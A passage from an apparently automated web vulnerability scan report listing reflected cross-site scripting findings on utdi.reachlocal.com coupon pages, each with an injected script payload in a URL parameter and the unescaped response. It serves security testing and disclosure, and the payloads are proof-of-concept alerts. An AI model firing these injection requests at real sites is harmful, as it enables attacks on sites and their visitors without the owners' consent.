User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:53:16 GMT
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Vary: Accept-Encoding
Content-Length: 3061
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:09 GMT;path=/;httponly


<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>

<title>UTDI (san francisco,CA)</title>

<META http-equiv=Content-Type content="text/html; charset=ISO-8859-1">
...[SNIP]...
5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=98d06"><script>alert(1)</script>76c9d147fa9&rl_track_landing_pages=1"
name="RL_main" topmargin=0 leftmargin=0 marginwidth=0 marginheight=0
noresize frameborder="no" scrolling="NO">
...[SNIP]...

2.59. http://utdi.reachlocal.com/coupon/ [rl_key parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.com
Path:   /coupon/

Issue detail

The value of the rl_key request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d92f9"><script>alert(1)</script>de87c2b7e5 was submitted in the rl_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=d92f9"><script>alert(1)</script>de87c2b7e5&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:55 GMT
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Vary: Accept-Encoding
Content-Length: 3015
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:48 GMT;path=/;httponly


<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>

<title>UTDI (san francisco,CA)</title>

<META http-equiv=Content-Type content="text/html; charset=ISO-8859-1">
...[SNIP]...
<frame src="/coupon/d837/837045/index5.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=d92f9"><script>alert(1)</script>de87c2b7e5&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landin
...[SNIP]...

2.60. http://utdi.reachlocal.com/coupon/ [scid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.com
Path:   /coupon/

Issue detail

The value of the scid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6519"><script>alert(1)</script>c8b035ec73b was submitted in the scid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/?scid=e6519"><script>alert(1)</script>c8b035ec73b&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:43 GMT
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Vary: Accept-Encoding
Content-Length: 3056
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:35 GMT;path=/;httponly


<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>

<title>UTDI (san francisco,CA)</title>

<META http-equiv=Content-Type content="text/html; charset=ISO-8859-1">
...[SNIP]...
<frame src="/coupon/d837/837045/index5.html?scid=e6519"><script>alert(1)</script>c8b035ec73b&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26i
...[SNIP]...

2.61. http://utdi.reachlocal.com/coupon/ [se_refer parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.com
Path:   /coupon/

Issue detail

The value of the se_refer request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61005"><script>alert(1)</script>ee0a10336fd was submitted in the se_refer parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=61005"><script>alert(1)</script>ee0a10336fd&pub_cr_id=8668759748 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:53:12 GMT
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Vary: Accept-Encoding
Content-Length: 2891
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:05 GMT;path=/;httponly


<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>

<title>UTDI (san francisco,CA)</title>

<META http-equiv=Content-Type content="text/html; charset=ISO-8859-1">
...[SNIP]...
<frame src="/coupon/d837/837045/index5.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=61005"><script>alert(1)</script>ee0a10336fd&pub_cr_id=8668759748&rl_track_landing_pages=1"
name="RL_main" topmargin=0 leftmargin=0 marginwidth=0 marginheight=0
noresize frameborder="no" scrolling="NO">
...[SNIP]...

2.62. http://utdi.reachlocal.com/coupon/ [tc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.com
Path:   /coupon/

Issue detail

The value of the tc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3305c"><script>alert(1)</script>2dc212c00e9 was submitted in the tc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/?scid=2323693&cid=837045&tc=3305c"><script>alert(1)</script>2dc212c00e9&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:51 GMT
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Vary: Accept-Encoding
Content-Length: 3047
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:44 GMT;path=/;httponly


<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>

<title>UTDI (san francisco,CA)</title>

<META http-equiv=Content-Type content="text/html; charset=ISO-8859-1">
...[SNIP]...
<frame src="/coupon/d837/837045/index5.html?scid=2323693&cid=837045&tc=3305c"><script>alert(1)</script>2dc212c00e9&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bserv
...[SNIP]...

2.63. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.com
Path:   /coupon/d837/837045/index5.html

Issue detail

The value of the cid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ca2e"><script>alert(1)</script>2688833dcab was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/d837/837045/index5.html?scid=2323693&cid=8370453ca2e"><script>alert(1)</script>2688833dcab&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=1 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.com/coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:52 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Content-Length: 3263
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:44 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<head>
<title>ReachLocal Index</title>

<LINK href="h
...[SNIP]...
<a class="ad_header_url" href="/coupon/d837/837045/index4.html?scid=2323693&cid=8370453ca2e"><script>alert(1)</script>2688833dcab&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%2
...[SNIP]...

2.64. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [dynamic_proxy parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.com
Path:   /coupon/d837/837045/index5.html

Issue detail

The value of the dynamic_proxy request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 846db"><script>alert(1)</script>3e97297b77d was submitted in the dynamic_proxy parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/d837/837045/index5.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1846db"><script>alert(1)</script>3e97297b77d&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=1 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.com/coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:53:00 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Content-Length: 3263
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:53 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<head>
<title>ReachLocal Index</title>

<LINK href="h
...[SNIP]...
<a class="ad_header_url" href="/coupon/d837/837045/index4.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1846db"><script>alert(1)</script>3e97297b77d&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=1" target="RL_top"
...[SNIP]...

2.65. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [kw parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.com
Path:   /coupon/d837/837045/index5.html

Issue detail

The value of the kw request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8930"><script>alert(1)</script>784bb32d3 was submitted in the kw parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/d837/837045/index5.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292e8930"><script>alert(1)</script>784bb32d3&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=1 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.com/coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:58 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Content-Length: 3259
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:51 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<head>
<title>ReachLocal Index</title>

<LINK href="h
...[SNIP]...
<a class="ad_header_url" href="/coupon/d837/837045/index4.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292e8930"><script>alert(1)</script>784bb32d3&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=1"
...[SNIP]...

2.66. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.com
Path:   /coupon/d837/837045/index5.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 790de"><script>alert(1)</script>9051fd7fffb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/d837/837045/index5.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=1&790de"><script>alert(1)</script>9051fd7fffb=1 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.com/coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:53:11 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Content-Length: 3269
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:04 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<head>
<title>ReachLocal Index</title>

<LINK href="h
...[SNIP]...
&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=1&790de"><script>alert(1)</script>9051fd7fffb=1" target="RL_top" onClick="javascript:open_popup('/coupon/d837/837045/index4.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&prima
...[SNIP]...

2.67. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [primary_serv parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.com
Path:   /coupon/d837/837045/index5.html

Issue detail

The value of the primary_serv request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58fcc"><script>alert(1)</script>222f71544b5 was submitted in the primary_serv parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/d837/837045/index5.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net58fcc"><script>alert(1)</script>222f71544b5&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=1 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.com/coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:53:02 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Content-Length: 3263
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:55 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<head>
<title>ReachLocal Index</title>

<LINK href="h
...[SNIP]...
ass="ad_header_url" href="/coupon/d837/837045/index4.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net58fcc"><script>alert(1)</script>222f71544b5&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=1" target="RL_top" onClick="javascript:open_popup(
...[SNIP]...

2.68. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [pub_cr_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.com
Path:   /coupon/d837/837045/index5.html

